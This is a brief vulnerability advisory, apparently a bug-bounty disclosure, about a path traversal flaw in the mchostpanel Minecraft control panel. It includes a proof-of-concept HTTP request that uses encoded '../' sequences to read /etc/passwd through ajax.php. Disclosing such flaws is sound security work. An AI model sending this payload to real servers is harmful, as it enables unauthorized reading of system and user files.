Path Traversal in alanaktion/mchostpanel
Sep 5th 2021
A Path Traversal vulnerability was identified in Minecraft server control panel which allows an attacker to access arbitrary user resources.
🕵️♂️ Proof of Concept
POST /ajax.php HTTP/1.1 Host: localhost:8080 User-Agent: curl/7.47.0 Accept: */* Content-Length: 45 Content-Type: application/x-www-form-urlencoded req=file_get&file=..%2F..%2F..%2Fetc%2Fpasswd
This issue may lead to unauthorized access to local file (information) disclosure.